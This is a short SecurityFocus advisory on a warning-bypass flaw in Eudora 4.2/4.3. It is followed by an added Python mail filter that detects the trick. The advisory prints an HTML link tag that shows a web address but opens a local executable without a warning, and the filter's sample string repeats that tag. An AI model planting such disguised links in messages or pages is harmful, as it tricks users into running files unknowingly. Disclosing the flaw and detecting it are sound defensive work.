Eudora 4.2/4.3 Warning Message Circumvention Vulnerability

Inserting the tag
<a href="file:///c:/eudora/attach/file.lnk">http://www.example.com</a>
in an email message will display as:
http://www.example.com
in a Eudora email client.

The visible text looks like an ordinary web address, but the link actually targets a local file. When a user clicks it, Eudora opens the executable file automatically, without displaying a warning.

Bennett Haselton <bennett@peacefire.org> has set up the following demonstration page:

http://www.peacefire.org/security/stealthattach/
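
A mail-filter check for the mismatch described above, written as an added Python example (not part of the original advisory or of Eudora): it flags anchors whose target is a file: URL or whose visible URL names a different host than the real target. The names `AnchorAudit` and `suspicious_links`, the policy set and the sample message are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed policy: a link in received mail must never resolve to these schemes.
LOCAL_SCHEMES = {"file"}

class AnchorAudit(HTMLParser):
    """Collect (href, visible text) for every <a> element in a message body."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.anchors = []
        self._href = None   # None means "not currently inside an <a>"
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None

def suspicious_links(html_body):
    """Return (href, text, reason) for anchors whose target is a local file
    or whose visible URL names a different host than the real target."""
    audit = AnchorAudit()
    audit.feed(html_body)
    audit.close()
    findings = []
    for href, text in audit.anchors:
        target = urlsplit(href.strip())  # urlsplit lower-cases the scheme
        # Strip spaces and non-breaking spaces that hide a URL in the text.
        shown = urlsplit(text.replace("\xa0", "").replace(" ", ""))
        if target.scheme in LOCAL_SCHEMES:
            findings.append((href, text, "local-file-target"))
        elif shown.scheme in ("http", "https") and shown.hostname != target.hostname:
            findings.append((href, text, "text-target-mismatch"))
    return findings

# Constructed sample: the tag from the advisory followed by one benign link.
SAMPLE = ('<p><a href="file:///c:/eudora/attach/file.lnk">http://www.example.com</a> '
          '<a href="http://www.example.com/news">http://www.example.com/news</a></p>')
```

Calling `suspicious_links(SAMPLE)` reports only the first anchor, with the reason `local-file-target`.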


 

Copyright 2010, SecurityFocus